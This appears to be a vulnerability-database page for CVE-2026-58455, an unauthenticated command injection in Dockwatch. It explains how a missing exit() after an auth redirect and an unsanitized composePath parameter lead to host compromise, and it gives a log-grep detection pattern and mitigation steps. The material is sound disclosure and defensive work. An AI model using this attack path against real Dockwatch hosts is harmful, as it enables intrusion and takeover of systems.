CVE-2026-58455
Received Received - Intake

Unauthenticated OS Command Injection in Dockwatch

Vulnerability report for CVE-2026-58455, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-02

Last updated on: 2026-07-02

Assigner: VulnCheck

Description

Dockwatch through 0.6.567 contains an unauthenticated OS command injection vulnerability that allows remote attackers to execute arbitrary shell commands by exploiting a missing exit() after an authentication redirect in loader.php combined with unsanitized input passed to shell_exec() in ajax/compose.php. Attackers can seed the required session flag through the incomplete auth check, then inject arbitrary commands via the composePath POST parameter in the composePull action to achieve full host compromise, facilitated by the standard deployment mounting of the Docker socket.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-07-02
Last Modified
2026-07-02
Generated
2026-07-02
AI Q&A
2026-07-02
EPSS Evaluated
N/A
NVD
EUVD

Affected Vendors & Products

Currently, no data is known.

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
CWE-698 The web application sends a redirect to another location, but instead of exiting, it executes additional code.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Compliance Impact

CVE-2026-58455 is a critical unauthenticated OS command injection vulnerability that allows remote attackers to execute arbitrary shell commands and achieve full host compromise. Such a severe security flaw can lead to unauthorized access, data breaches, and potential manipulation or exfiltration of sensitive information.

Because of the risk of full host compromise and unauthorized data access, this vulnerability can negatively impact compliance with common standards and regulations such as GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.

Organizations using affected versions of Dockwatch must address this vulnerability promptly to maintain compliance and avoid penalties related to data protection and security requirements.

Executive Summary

CVE-2026-58455 is a critical unauthenticated OS command injection vulnerability in Dockwatch version 0.6.567 and earlier. It arises because the application fails to exit after an authentication redirect in loader.php, allowing the script to continue running. Additionally, unsanitized user input is passed directly to shell_exec() in ajax/compose.php via the composePath POST parameter during the composePull action.

Attackers can exploit this by setting a required session flag through the incomplete authentication check, then injecting arbitrary shell commands through the composePath parameter. This leads to remote code execution without authentication, potentially resulting in full host compromise, especially since the Docker socket is typically mounted in the standard deployment.

Impact Analysis

This vulnerability allows remote attackers to execute arbitrary shell commands on the affected host without any authentication. This can lead to full compromise of the host system where Dockwatch is running.

  • Attackers can gain complete control over the system.
  • They can manipulate or steal sensitive data.
  • They can disrupt services or deploy further malware.
  • The vulnerability is especially dangerous due to the Docker socket being mounted, which can allow attackers to control Docker containers and the host environment.
Detection Guidance

This vulnerability can be detected by monitoring for unusual or unauthorized POST requests to ajax/compose.php, specifically those using the composePull action with the composePath parameter containing suspicious shell metacharacters or commands.

You can also check for unexpected session flags being set due to the incomplete authentication check in loader.php.

A practical detection approach is to inspect web server logs for POST requests to ajax/compose.php with payloads that include shell metacharacters such as ";", "&", or backticks.

  • Use command-line tools like grep to search logs: grep -i 'composePull' /var/log/nginx/access.log | grep -E 'composePath=.*[;&`]'
  • Monitor running processes or command history for unexpected shell commands that could have been injected.
Mitigation Strategies

Immediate mitigation steps include updating Dockwatch to a version that contains the fix for this vulnerability.

The fix involves adding an exit() call after the authentication redirect in loader.php to prevent further execution and sanitizing the composePath parameter in ajax/compose.php by wrapping it with escapeshellarg() to prevent shell command injection.

If an update is not immediately possible, restrict access to the Dockwatch application, especially the ajax/compose.php endpoint, to trusted users or networks only.

Additionally, avoid mounting the Docker socket in the standard deployment until the vulnerability is patched, as this facilitates full host compromise.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-58455. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart